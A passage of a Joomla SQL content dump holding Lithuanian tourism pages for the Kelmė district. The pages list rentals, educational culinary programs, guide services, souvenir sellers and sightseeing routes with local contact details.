yout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,60,'','',1,2048,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(195,282,'Aktyvus poilsis','aktyvus-poilsis','','<h5 class=\"attribute-header-line\">Aktyvaus poilsio paslaugos</h5>\r\n<table class=\"renderedtable\" style=\"width: 525px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" width=\"295\"> </td>\r\n</tr>\r\n<tr class=\"bglight\">\r\n<td valign=\"top\">\r\n<p><strong>Dviračių nuoma Tytuvėnuose:</strong></p>\r\n<p><strong><span>VšĮ „Tytuvėnų piligrimų centras“</span></strong><br />Adresas: Maironio g. 2a, Tytuvėnai, Kelmės r.  <br />Tel. 8 427 56223<br />El. paštas <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a><br />Interneto svetainė <a href=\"http://www.infotytuvenai.lt/\">www.infotytuvenai.lt</a></p>\r\n<p><strong> </strong></p>\r\n<p><strong>Dviračių ir paspirtukų nuoma:</strong></p>\r\n<p>Adresas: Taikos g. 2, Tytuvėnai<br />Tel. +370 690 99111, +370 698 83111</p>\r\n<p><strong> </strong></p>\r\n<p><strong>Baidarių, plaustų, katamaranų nuoma:</strong></p>\r\n<p><strong>Baidarės ir katamaranai</strong><br />Tel. 8 <span>611 41826</span><br />El. paštas <a href=\"mailto:katamaranai.visiems@gmail.com\">katamaranai.visiems@gmail.com</a><br />Interneto svetainė <a href=\"http://www.irkluojambaidares.lt/\">http://www.katamaranai.lt</a></p>\r\n<p><strong> </strong></p>\r\n<p><strong>Tomas Mitkevičius</strong><br />Adresas: Zakeliškiai, Kelmės r.<br />Tel. 8 617 93 293<br />El. paštas info<a href=\"mailto:akucinskas@gmail.com\">@zakeliskiai.</a>lt<br />Interneto svetainė <a href=\"http://www.irkluojambaidares.lt/\">http://www.zakeliskiai.lt</a></p>\r\n<p><strong> </strong></p>\r\n<p><strong>Algirdas Kučinskas</strong><br />Adresas: Jaunimo g. 10-1, Janaučiai, Kelmės r.<br />Tel. 8 695 53 763<br />El. paštas: <a href=\"mailto:akucinskas@gmail.com\">akucinskas@gmail.com</a><br />Interneto svetainė <a href=\"http://www.irkluojambaidares.lt/\">http://www.irkluojambaidares.lt</a></p>\r\n<p><strong> </strong></p>\r\n<p><strong>Robertas Mosiejus</strong><br />Adresas: <span>J.Basanavičiaus g. 26, LT-86486, Tytuvėnai, Kelmės r.</span><br />Tel. <span>8 656 12321</span><br />El. paštas info@dubysos-baidares.lt<br />Interneto svetainė http://www.dubysos-baidares.lt/</p>\r\n<p> </p>\r\n<p><strong>Gedas Kauneckas</strong><br />Adresas: Lyduvėnai, Raseinių r.<br />Tel. 8 682 42 584<br />El. paštas lyduvenu.baidares@gmail.com<br />Interneto svetainė <a href=\"http://www.lyduvenu-baidares.lt/\">http://www.lyduvenu-baidares.lt/</a></p>\r\n<p> </p>\r\n<p><strong>Pabariukų baidarės</strong><br />Adresas: Pabariukų km, Kelmės r.<br />Tel. 8 699 31 967 <br />El. paštas astakami@gmail.com<br />Interneto svetainė <a href=\"http://www.pabariukai.lt/\">http://www.pabariukai.lt</a></p>\r\n<p> </p>\r\n<p class=\"pjusttify\"><strong>Kaimo turizmo sodyba „5 sezonas“</strong><br />Adresas: <span>Rėžalių k., Tytuvėnų apylinkių seniūnija, Kelmės rajonas<br />Mob. 8 611 16 797<br />El. paštas </span><a href=\"mailto:info@5sezonas.lt\" target=\"_self\">info@5sezonas.lt</a><br /><span>Interneto svetainė </span><a href=\"http://www.5sezonas.lt/\" target=\"_blank\">www.5sezonas.lt</a><span> </span></p>\r\n<p><strong> </strong></p>\r\n<p><strong>Kaimo turizmo sodyba „Gaja“</strong><br />Adresas: <span>Pabariukų k., Tytuvėnų sen., Kelmės r.<br />Tel. 8 611 99616</span><br />El. paštas <a href=\"mailto:info@sodybagaja.lt\">info@sodybagaja.lt</a><br />Interneto svetainė <a href=\"http://www.sodybagaja.lt/\">www.sodybagaja.lt</a> </p>\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr class=\"bgdark\">\r\n<td valign=\"top\"> \r\n<table class=\"renderedtable\" style=\"width: 100%;\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" width=\"295\">\r\n<p><strong>Žvejyba ir medžioklė</strong></p>\r\n<p><strong>Kaimo turizmo sodyba „Miego klinika“<br />Adresas: </strong><span>Raudsparnės k., Kelmės r.<br />Mob. 8 612 22 203 <br />El. paštas </span><a href=\"mailto:info@miegoklinika.lt\" target=\"_self\">info@miegoklinika.lt</a><br /><span>Interneto svetainė </span><a href=\"http://www.miegoklinika.lt/\" target=\"_blank\">www.miegoklinika.lt</a><span> </span></p>\r\n<p><strong> </strong></p>\r\n<p><strong>Komercinė žvejyba ir medžioklė</strong><br />UAB „Šilo Pavėžupis“<br />Adresas: Tujų g. 3, Laikšės, Kelmės r.<br />Tel. (8 427) 45 425. <br /><span>El. paštas biuras</span><a href=\"mailto:info@miegoklinika.lt\" target=\"_self\">@fishery.lt</a><br /><span>Interneto svetainė </span><a href=\"http://www.miegoklinika.lt/\" target=\"_blank\">www.fishery.lt</a><span> </span></p>\r\n</td>\r\n</tr>\r\n<tr class=\"bglight\">\r\n<td valign=\"top\" width=\"295\">\r\n<p><strong> </strong></p>\r\n<p><strong>Komercinė medžioklė ir žvejybos leidimų išdavimas</strong></p>\r\n<p>Komercines medžiokles organizuoja ir leidimus žvejoti rajono ežeruose ir upėse išduoda Lietuvos medžiotojų ir žvejų draugijos Kelmės skyrius.</p>\r\n<p>Adresas: Vytauto Didžiojo g. 140, Kelmė <br />Tel. 8 427 51458.</p>\r\n<p> </p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr class=\"bglight\">\r\n<td valign=\"top\" width=\"295\">\r\n<p><strong>Baseinas</strong></p>\r\n<p><strong>Kelmės profesinio rengimo centro Tytuvėnų skyrius</strong><br />Uždaras plaukimo baseinas (25 m) <br />Adresas: Budraičių k., Tytuvėnų apyl. sen., Kelmės r.<br />Tel. (8 427) 61 074.</p>\r\n</td>\r\n</tr>\r\n<tr class=\"bgdark\">\r\n<td valign=\"top\">\r\n<p><strong> </strong></p>\r\n<p><strong>Šaudymas lankais</strong></p>\r\n<p><strong>Lankininkų klubas „Perkūno strėlė“</strong><br />Puiki pramoga visai šeimai ne tik gerai praleisti laiką, bet ir išmėginti akies taiklumą.<br />Kražių miestelis, Kelmės rajonas<br />Tel. 8 687 65 770<br />El. paštas <a href=\"mailto:lankininkai@perkunostrele.lt\" target=\"_self\">lankininkai@perkunostrele.lt</a>     <br />Interneto svetainė <a href=\"http://www.perkunostrele.lt\" target=\"_self\">http://www.perkunostrele.lt</a></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,52,'2014-06-04 18:15:38',135,'','2021-06-25 04:07:37',135,135,'2021-06-25 04:07:37','2014-06-04 18:15:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,9,'','',1,10443,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(196,283,'Kulinarinis paveldas','kulinarinis-paveldas','','<p><strong><span style=\"font-size: 19px;\">Kulinarinio paveldo edukacinės programos</span></strong></p>\r\n<p><strong>EDUKACINĖ PROGRAMA „NAMINĖS DUONOS KEPIMAS“</strong></p>\r\n<p>Išskirtinė žemaitiška duona su lašinukais.</p>\r\n<p>Šios programos tikslas yra ne tik perduoti informaciją apie  naminės duonos kepimą, bet ir skatinti visus dalyvius būti aktyviais dalyviais visuose duonos kepimo procesuose, o kartu ir išsikepti sau kepalėlį naminės duonos bei paskanauti patiekalų iš duoninės tešlos, kuriuos  patys dalyviai gamins bendruomenės virtuvėje.</p>\r\n<p>Programos dalyviai:</p>\r\n<ul>\r\n<li>išgirs įvadinį pasakojimą apie duoną, jos reikšmę žmonių gyvenime;</li>\r\n<li>baigs kūrenti ir paruošti pečių duonai kepti;</li>\r\n<li>susipažins su duonos kepimui reikalingais reikmenimis;</li>\r\n<li>bandys išsijoti rupiai maltus ruginius miltus;</li>\r\n<li>žiūrės videofilmo „Žemaitijoj dar kepa duoną“ ištrauką;</li>\r\n<li>visi bandys įdėti duonos tešlą į skardeles ir pašaus į pečių;</li>\r\n<li>grupelė dalyvių bandys \"kalataukoj\" sumušti naminį sviestą, kuris bus tepamas ant iškeptos duonos;</li>\r\n<li>kitame duonkubilyje mokysis minkyti duonos tešlą, kuri bus naudojama duoninės tešlos gaminių kepimui;</li>\r\n<li>virtuvėje iš duoninės tešlos bus formuojami maži paplotėliai ir kepami keptuvėje ant aliejaus;</li>\r\n<li>kita grupelė iš atminkytos tešlos darys ,,kleckučius“ ir virs verdančiame vandenyje;</li>\r\n<li>iš rūkytų lašinukų, svogūno, miltų ir pieno gamins ,,kleckučiams“ padažą;</li>\r\n<li>duonos gėrimo gamyba (iš senos duonos plutų);</li>\r\n<li>iškeptos duonos, ir duoninių  patiekalų degustacija ir įsigijimas.</li>\r\n</ul>\r\n<p><strong>Junkilų kaimo bendruomenė „Kruteklis“</strong></p>\r\n<p>Vadovė Onutė Granickienė<br />Junkilų k., Užvenčio sen. Kelmės r.<br />Tel.: 8 682 54 900<br />El. paštas bimbalassss@gmail.com</p>\r\n<p> </p>\r\n<p><strong>EDUKACINĖ PROGRAMA „PAS ŽEMAIČIUS ATVYKUS“</strong></p>\r\n<p>Edukacinio užsiėmimo metu dalyviai bus supažindinti su lietuvių liaudies instrumentais: skudučiais, kanklėmis, žvangučiais ir kt. Dalyviai galės pabandyti pagroti visais instrumentais, na o piemenukų skudučius, kurie pagaminti iš nendrės ar garšvos, – pasigaminti patys. Įjungus visus instrumentus, bus sukurta grupė, kuri pagal ritminį elementą sugros muzikinį kūrinį. Vėliau dalyviai bus supažindinti su lietuvių liaudies dainomis ir išmokyti šokti vieną linksmiausių liaudiškų šokių – gransverą.</p>\r\n<p>Šalia muzikos ir šokių dalyviams bus pristatytas žemaitiškas patiekalas – kastinys, kurį pakviesime pasigaminti pačius dalyvius.</p>\r\n<p>Kastinys - tai žemaičių valgis. Jis dažniausiai būdavo sukamas iš pašildytos grietinės ir sviesto arba iš varškės, grietinės ir sviesto. Kiekviena žemaitė šeimininkė sukdavo vis kitokį kastinį pagal savo receptą. Jis galėdavęs būti šventinis ar kasdieninis, riebus ar liesas, pagardintas česnakais, pipirais, kmynais, svogūnų laiškais, mėtomis, muskatais... Valgydavo jį su karštomis su lupenomis išvirtomis bulvėmis. Gatavo kastinio galima nusipirkti parduotuvėse, tačiau gaminant pačiai galima nevaržomai improvizuoti ir susikurti nepakartojamą patiekalą.</p>\r\n<p>Edukacinį užsiėmimą ves tautiniais rūbais apsirengę vedėjai.</p>\r\n<p>Programą galima skaidyti dalimis pasirenkant vieną iš dalių (kastinio gamyba, muzikos instrumentai arba šokiai).</p>\r\n<p>Kaina grupei (2–4 žmonės)  – 35 Lt. Kaina grupei (daugiau kaip 4 žmonės) – 10 Lt asmeniui.</p>\r\n<p>Edukacinės programos įgyvendinimo laikas: visus metus. Programos trukmė – pagal pasirinktus užsiėmimus.</p>\r\n<p><strong>Kražių bendruomenė</strong></p>\r\n<p>Vadovė Lina Mikalajūnaitė<br />M. Valančiaus g. 59, Kražiai<br />Tel. 8 616 06043<br />E. p. lina.mikalajunaite@gmail.com</p>\r\n<p> </p>\r\n<p><strong>EDUKACINĖ PROGRAMA ,,SVEČIUOSE ŽALPIŲ KAIMO BENDRUOMENĖJE“</strong></p>\r\n<p>Žalpių kaimo bendruomenės edukacinė programa skirta vaikams ir suaugusiesiems. Edukacinė programa paruošta, remiantis istoriniais šaltiniais, senų vietinių gyventojų sukauptomis žiniomis ir patirtimi. Pristatoma edukacinė programa suteikia galimybę susipažinti su Žalpių krašto istorija, papročiais, paskanauti žalpiškių šeimininkių paruoštų patiekalų.</p>\r\n<p>Sukurtos edukacinės programos tikslas yra ne tik perduoti informaciją, gauti žinių ir įgyti patyrimo, bet ir paskatinti pabūti aktyviais dalyviais, kartu gerai praleisti laiką.</p>\r\n<p>Edukacinė programa pradedama Žalpių kraštotyros muziejuje: muziejinės ekspozicijos pristatymas, kuriame supažindinama su Žalpių praeitimi, garsiais žmonėmis ir jų darbais. Demonstruojami senieji buities rakandai.  Bendruomenės namuose, papasakojame kuo garsūs Žalpiai šiomis dienomis. Kadangi, Žalpių šeimininkės labai aktyvios ir skaniai gamina, jos siūlo paragauti bandelių su lašinukais, karštų žirnių su spirgučiais, naminės giros arba pačių užaugintų vaistažolių arbatos su medumi.</p>\r\n<p>Programos trukmė: 1,5 – 2 val.<br />Minimali užsiėmimo kaina: 200 Lt<br />Grupės dydis iki 20 žmonių.<br />Į programos kainą įskaičiuota:<br />Muziejinės ekspozicijos pristatymas;<br />Bandelių su lašinukais keptų vietoje degustacija su arbata arba gira (pasirinktinai). Žirnių su spirgučiais virtų vietoje ragavimas su gira.</p>\r\n<p>Dėl patiekalų galima tartis.</p>\r\n<p><strong>Žalpių bendruomenė</strong></p>\r\n<p>Vadovė Alina Žalandauskienė<br />Žalpių k., Pakražančio sen.,Kelmės r.<br />Tel.: 8 640 21 774, 8 610 21 966, (8 427) 49 541<br />El. paštas zalpiai@gmail.com</p>','',0,0,0,52,'2014-06-04 18:21:21',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2014-06-04 18:21:21','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,8,'','',1,6676,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(197,284,'Gido paslaugos','gido-paslaugos','','<div class=\"text_text\">\r\n<p><strong>Gido paslaugos Kelmės rajone</strong></p>\r\n<p><span>Tytuvėnuose:</span><br /><span>Tytuvėnų piligrimų centras</span><br /><span>Adresas: Maironio g. 2a, Tytuvėnai, Kelmės r.</span><br /><span>Tel. 8 678 77676</span><br /><span>El. p. </span><a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a><span>, </span><br /><span>Interneto svetainė </span><a href=\"http://www.infotytuvenai.lt/\">www.infotytuvenai.lt </a></p>\r\n<p> </p>\r\n<p>Kelmėje: <br />Kelmės krašto muziejus<br />Adresas: Dvaro g. 15, Kelmė<br />Tel. (8 427) 61 065 <br />El. p. kelmesmuziejus@gmail.com<br />Interneto svetainė <a href=\"http://www.kelmesmuziejus.lt\">www.kelmesmuziejus.lt</a></p>\r\n<p> </p>\r\n<p>VšĮ Kelmės turizmo ir verslo informacijos centras<br />Birutės g. 4, LT86163 Kelmė<br />Tel.: 8 427 61430<br />Tinklapis: <a href=\"http://www.kelmevic.lt\" target=\"_blank\">www.kelmevic.lt</a></p>\r\n<p><br />Kražiuose:<br />Kražių M. K. Sarbievijaus kultūros centras<br />Adresas: Kolegijos g. 5, Kražiai, Kelmės r.<br />Tel. (8 427) 58 148<br />El. p. kraziai.turizmas@kraziai.lt<br />Interneto svetainė <a href=\"http://www.kraziai.lt\">www.kraziai.lt</a></p>\r\n</div>','',1,0,0,31,'2014-06-04 18:28:36',135,'','2018-06-12 13:35:51',135,0,'0000-00-00 00:00:00','2014-06-04 18:28:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,12,'','',1,9541,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(198,285,'Suvenyrai','suvenyrai','','<p> </p>\r\n<div class=\"text_text\">\r\n<p><strong><span style=\"font-size: 19px;\">Suvenyrais ir Kelmės krašto amatininkų dirbiniais prekiauja:</span></strong></p>\r\n<p><strong>Kelmėje</strong></p>\r\n<p><strong>Kelmės krašto muziejus</strong></p>\r\n<p>Dvaro g. 15, Kelmė</p>\r\n<p>Tel. (8 427) 61 065</p>\r\n<p>El. p. <a href=\"mailto:kelmesmuziejus@gmail.com\">kelmesmuziejus@gmail.com</a></p>\r\n<p>Interneto svetainė <a>www.kelmesmuziejus.lt</a>  </p>\r\n<p> </p>\r\n<p><strong>VšĮ Kelmės turizmo ir verslo informacijos centras</strong></p>\r\n<p><span>Birutės g. 4, LT86163 Kelmė</span></p>\r\n<p><span>Tel.: 8 427 61430</span></p>\r\n<p><span>Tinklapis: </span><a href=\"http://www.kelmevic.lt\" target=\"_blank\">www.kelmevic.lt</a></p>\r\n<p> </p>\r\n<p><strong>SĮ Kelmės knygynas</strong></p>\r\n<p>Vytauto Didžiojo g. 39, Kelmė</p>\r\n<p>Tel.  (8 427) 51452</p>\r\n<p>El. p. <a href=\"mailto:kelmesmuziejus@takas.lt\">knygynas@takas.lt</a></p>\r\n<p>Interneto svetainė <a>www.kelmesknygynas.lt</a>  </p>\r\n<p> </p>\r\n<p><strong>Tytuvėnuose</strong></p>\r\n<p><strong>VšĮ „Tytuvėnų piligrimų centras“</strong></p>\r\n<p>Maironio g. 2a, Tytuvėnai, Kelmės r.</p>\r\n<p>Tel. +370 675 58506</p>\r\n<p>El. p. <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></p>\r\n<p>Interneto svetainė <a href=\"http://www.infotytuvenai.lt/\">www.infotytuvenai.lt</a></p>\r\n<p> </p>\r\n<p><strong>Kražiuose</strong></p>\r\n<p><strong>M. K. Sarbievijaus kultūros centras</strong></p>\r\n<p>Adresas: Kolegijos g. 5, Kražiai</p>\r\n<p>Tel. (8 427) 58 148</p>\r\n<div>El. p. <a href=\"mailto:el.p.kraziukc@gmail.com\">kraziukc@kraziai.lt</a></div>\r\n<div> </div>\r\n<div>Interneto svetainė <a href=\"http://www.kraziai.lt\">www.kraziai.lt</a></div>\r\n</div>','',1,0,0,52,'2014-06-04 18:32:07',135,'','2024-09-28 09:33:58',135,0,'0000-00-00 00:00:00','2014-06-04 18:32:07','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,7,'','',1,7679,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(199,286,'Turizmo maršrutai','turizmo-marsrutai','','<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Kelmės krašto turizmo maršrutai</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Gamtos ir pažinimo takais...</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" rowspan=\"2\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/gamtos_takais/{/gallery}</td>\r\n<td rowspan=\"2\">\r\n<p><strong>Tytuvėnų regioninis parkas</strong> – <em>tai </em><em>ežeruotas pelkėtų apylinkių kraštovaizdis, kultūros paveldo vertybių, draustinių ir saugomų objektų gausa. </em><strong>Giliaus pažintinis takas</strong> – <em>puikus poilsis pėsčiomis</em> <em>ir galimybė pasigėrėti vaizdinga ežero, pasak legendos, senovėje atūžusio oru ir užkritusio ant čia augusio miško, gamta</em>; <strong>Bridvaišio piliakalnis</strong> <em>įrengtas žemaičių genčių žemėse, šiauriniame Bridvaišio ežero krante esančioje kalvoje, buvusioje ežero saloje</em>; <strong>apžvalgos bokštas </strong><em>suteikia</em><em>puikią galimybę</em> <em>nuo Kokmaniškės kalno pasigėrėti apylinkių vaizdais, stebėti paukščius.</em></p>\r\n<p><strong>Miško muziejus – </strong><em>čia eksponuojami paukščių inkilai, medžio drožiniai, paukščių lizdai, miško žvėrių ir paukščių iškamšos.</em></p>\r\n<p><strong>Akmenų ruožas (Akmenų rūža)</strong>. <em>Akmenų ruožas (kitaip vadinamas Tučkinės) įspūdingas savo ilgiu - terasos šlaitu driekiasi net 1,65 km. Šis ruožas susiformavo prieš 10-14 tūkst. metų, paskutinėje ledynų tirpimo stadijoje. Į rytus nuo akmenų ruožo telkšojo prieledyninis ežeras, o vakarinėje pusėje tūnojo betirpstantis ledynas, buvęs šio ežero krantu. Patvenkto ežero vietoje dabar plyti terasa, o jos šlaitas sutampa su Akmenų ruožu.</em></p>\r\n<p><strong>Akmenų ruožas (Velniakelis).</strong> <em>Velniakelis (kitaip vadinamas Paežerio, Peleniaus rūža) tęsiasi 350 m ir yra taisyklingos pylimo formos. Jo pietiniame gale, ties sodyba, plyti smėlio kūgis, kuris liudija, kad šioje vietoje iš ledyno plyšio ištekėjo tirpsmo vandens srautai, kurie ir išplovė Velniakelio akmenis. Ruožo atsiradimo istorija turi savo legendą. Žmonės pasakoja, jog kadaise gyvenęs dvarponis pardavė dūšią velniui, o mainais paprašė nutiesti akmeninį kelią. Raguotasis visą naktį tempė akmenis, o užgiedojus gaidžiams viską metė ir dingo...</em></p>\r\n<p><strong>Kukečiai: Burbaičių piliakalnis.</strong> P<em>asak legendos,</em> <em>jį senovėje supylęs milžinas, čia prasmego kadais stovėjusi</em><em> bažnyčia.</em></p>\r\n<p><strong>Šaukėnai: </strong><strong>Svilės šaltiniai</strong>, <em>trykštantys 1,8 ha plote, yra</em> <em>didžiausi Lietuvoje, čia iš žemės veržiasi per šimtas šaltinių; iš versmių ištekančiame Svilės upelyje (vieninteliame Lietuvoje) aptinkami ledynmečio reliktiniai vabzdžiai – arktinės apsiuvos</em>).</p>\r\n<p><strong>Užventis: </strong><strong>Švento Martyno pušis</strong> – <em>yra</em><em>16 m</em><em> aukščio ir 320 cm apimties; vieta, kurioje auga ši pušis, nuo seno laikoma šventa.</em></p>\r\n<p><strong>Malūnas </strong><em>dar mena čia gyvenusią ir kūrusią rašytoją Šatrijos Raganą.</em><em> Dabar čia įsikūrusiame sveikatingumo komplekse galima maloniai praleisti laiką. </em></p>\r\n<p><strong>Užvenčio kraštotyros muziejus</strong> <em>įsikūręs restauruotame senojo Užvenčio dvaro svirne. Šiame dvare jaunystėje dešimt metų gyveno rašytoja</em> <em>Šatrijos Ragana.</em></p>\r\n<p><strong>Kražiai</strong>: <strong>Medžiokalnis </strong>– <em>senovėje čia buvo alkakalnis,</em> <em>augo šventas</em> <em>ąžuolas, iš po kurio šaknų tryško šventas vanduo, netoli jo kūrenosi šventoji ugnis ir stovėjo deivės Medeinės statula; į Medžiokalnį veda akmeniniai laiptai, grįsti Vytauto Didžiojo laikais.</em></p>\r\n<p><strong>Pakražančio seniūnija:</strong> <strong>Kriaučiaus akmuo </strong>– <em>geologinis paminklas, paskutiniojo ledynmečio reliktas, trečias pagal dydį akmuo Lietuvoje.</em></p>\r\n<p><strong>Kelionės metu nuvažiuojama apie 150 km.</strong></p>\r\n<p><strong>Kelionės trukmė apie 10 val.</strong></p>\r\n<p><strong>Siūlome keliauti automobiliu.</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Kelmės krašto dvarai</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/kelmes_dvarai/{/gallery}</td>\r\n<td><strong><strong>Kelmės dvaro sodyba.</strong></strong><em>Kelmės krašto muziejus įsikūręs Kelmės dvaro rūmuose. Muziejaus ekspozicijos išdėstytos trijuose šio ansamblio pastatuose: rūmuose, vartuose ir svirne. Kelmės dvaro ansamblis – valstybės saugomas kultūros paveldo objektas, vertinamas kaip retai išlikusi baroko stiliaus Lietuvos provincijos dvaro sodyba. Kelmės dvaro ansamblio mūriniai rūmai statyti 1780 m., dviaukščiai bokšto išvaizdos vartai – 1668 m. Kelmės dvaro sodybos teritorijos plotas kartu su parku – 15,2 ha. Daugiau kaip 300 metų Kelmės dvarą valdė lenkų kilmės bajorai Gruževskiai (Gruzewski). </em>\r\n<p><strong>Beržėnų dvaro rūmai.</strong> <em>Dvaras, minimas nuo XV a., yra priklausęs grafams Hutten-Čapskiams. Jų laikais pastatyti mūsų dienų sulaukę, ne kartą rekonstruoti dvaro pastatai, įkurtas parkas, žvėrynas, iškasti tvenkiniai, dvaro teritorija apjuosta mūro tvora. Centriniai dvaro rūmai puošnūs, dviaukščiai su trijų aukštų bokštu.</em></p>\r\n<p><strong>Užvenčio dvaras </strong><em>nuo 1527 m. buvo Lietuvos didžiojo kunigaikščio žinioje. Su dvaru susiję Šatrijos Raganos, Švedijos karaliaus Karolio XII, Nepriklausomybės Akto signataro J. Smilgevičiaus vardai. Iki šiol išlikusiam iš stiprių ąžuolinių rąstų suręstam pastatui daugiau kaip trys šimtai metų.</em></p>\r\n<p><strong>Pakėvio</strong><strong> dvaras –</strong><em> dvaras žinomas nuo XVII a. 1685 metais dvaras paminėtas Beržėnų valsčiaus aktuose. XIX a. Pakėvį išgarsino čia gimęs etnografas, tautosakininkas, literatūros istorikas Liudvikas Adomas Jucevičius (1813-1846), kuris pasirašinėjo Liudwik z Pokiewia slapyvardžiu. Dvaro teritorija užima 38 ha plotą. Tai rami ir nuošali vieta, unikali 